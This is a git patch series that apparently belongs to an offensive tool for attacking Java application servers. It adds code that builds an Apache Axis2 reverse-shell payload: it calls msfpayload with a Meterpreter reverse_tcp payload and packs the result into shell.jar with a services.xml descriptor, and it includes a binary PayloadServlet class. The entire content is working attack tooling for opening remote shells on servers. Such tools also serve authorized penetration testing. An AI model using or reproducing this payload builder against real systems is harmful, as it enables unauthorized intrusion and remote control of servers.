From 99114f4d23276c929f89cf1779b5ac00867bc802 Mon Sep 17 00:00:00 2001
From: Steve Breen <breen.machine@gmail.com>
Date: Tue, 6 May 2014 22:49:32 -0700
Subject: [PATCH 1/2] Added support for generation of Apache axis2 payloads

---
 src/module/generate_payload.py | 29 ++++++++++++++++++++++++++++-
 1 file changed, 28 insertions(+), 1 deletion(-)

diff --git a/src/module/generate_payload.py b/src/module/generate_payload.py
index 0065715..ef0467f 100644
--- a/src/module/generate_payload.py
+++ b/src/module/generate_payload.py
@@ -1,7 +1,8 @@
 from commands import getoutput
 from log import LOG
 import utility
-
+import os
+from zipfile import ZipFile
 
 def run(options):
     """ This module is used for generating reverse shell payloads.  It's not
@@ -19,6 +20,9 @@ def run(options):
         return
     elif options.remote_service in ["coldfusion"]:
         out = "R > shell.jsp"
+    elif options.remote_service in ["axis2"]:
+        PAYLOAD = "java/meterpreter/reverse_tcp"
+        out = "R > shell.jar"
     else:
         out = "W > shell.war"
 
@@ -32,6 +36,29 @@ def run(options):
     resp = getoutput("msfpayload %s LHOST=%s LPORT=%s %s" %
                     (PAYLOAD, lhost, lport, out))
 
+    '''For axis2 payloads, we have to add a few things to the msfpayload output'''
+    if(options.remote_service in ["axis2"]):
+        services_xml="""<service name="shell" scope="application">
+                            <description>
+                                Clusterd axis2 service
+                            </description>
+                            <messageReceivers>
+                                <messageReceiver
+                                    mep="http://www.w3.org/2004/08/wsdl/in-only"
+                                    class="org.apache.axis2.rpc.receivers.RPCInOnlyMessageReceiver"/>
+                                <messageReceiver
+                                    mep="http://www.w3.org/2004/08/wsdl/in-out"
+                                    class="org.apache.axis2.rpc.receivers.RPCMessageReceiver"/>
+                            </messageReceivers>
+                            <parameter name="ServiceClass">
+                                metasploit.PayloadServlet
+                            </parameter>
+                        </service>"""
+
+        with ZipFile('shell.jar', 'a') as shellZip:
+            shellZip.write("./src/lib/axis2/PayloadServlet.class","metasploit/PayloadServlet.class")
+            shellZip.writestr("META-INF/services.xml",services_xml)
+
     if len(resp) <= 1 or 'Created by' in resp:
         utility.Msg("Payload generated (%s).  Payload: %s" % (out.split(' ')[2], PAYLOAD))
 

From d92fcd2c986746e2d0369ff953a82cf024d88d63 Mon Sep 17 00:00:00 2001
From: Steve Breen <breen.machine@gmail.com>
Date: Tue, 6 May 2014 23:00:12 -0700
Subject: [PATCH 2/2] Added PayloadServlet library for axis2 payload generation

---
 src/lib/axis2/PayloadServlet.class | Bin 0 -> 803 bytes
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100755 src/lib/axis2/PayloadServlet.class

diff --git a/src/lib/axis2/PayloadServlet.class b/src/lib/axis2/PayloadServlet.class
new file mode 100755
index 0000000000000000000000000000000000000000..00e4e00e0d30a437c58f14cc52016f859dc0c38b
GIT binary patch
literal 803
zcmah{TTc@~6#j<Jc3@eB76dDDzqmzkQF)?<7h}|fC}|0V@HEg#S+nex-6_Fe#4|5k
zH2MShQG_$wQd&*)Wp>Zy`_4JvIXAaIej|frytUzARN!eZ3O1f$OyGGx#xWr<X+vPj
zJkvI2Fe@-8FfXvckbUQezFud@xW#P-{ywTIGU7(aU{#}!N;8z*jc@Wqo_dLjPXeXA
zL#^xHCweMPM_C;=RH94&O-t%gn5dGeWPdn4P<8E-L*Rvg>)<g47zRx#FOXr)tLWGd
zYYfzP(ZM2KG7LRL+jxN`hvt9Ph21)gm8=?0&%p`?1YSFMV+s_Gl$J?7h<xpB%I`rW
ztF18@CjLDqL;j(Dxe<nPKOnXKK(*M~{oQx%N8abJ9p3!kjnD#)q)*b1xO=IXokFCt
zjdyq0UO-b>hQ6B8JF%}-%rNQ}n<P|ulca0~N+#05em_XcZzWpBwDYFW-9WmCgCI&2
zrqNHg#_$NB(_?0F^bV4hqc1HC*5W1DIsJglTsu4ujvn&m_%HPAX7ZWJ75EwW#(9cz
zDAA%YM;=3zXc$+ig7Hl)T_elz<tM~0k@v3g0>41t8LTzFd;!}q2#lbRW)Bl0OAJrQ
FgF7LJ#3=v(

literal 0
HcmV?d00001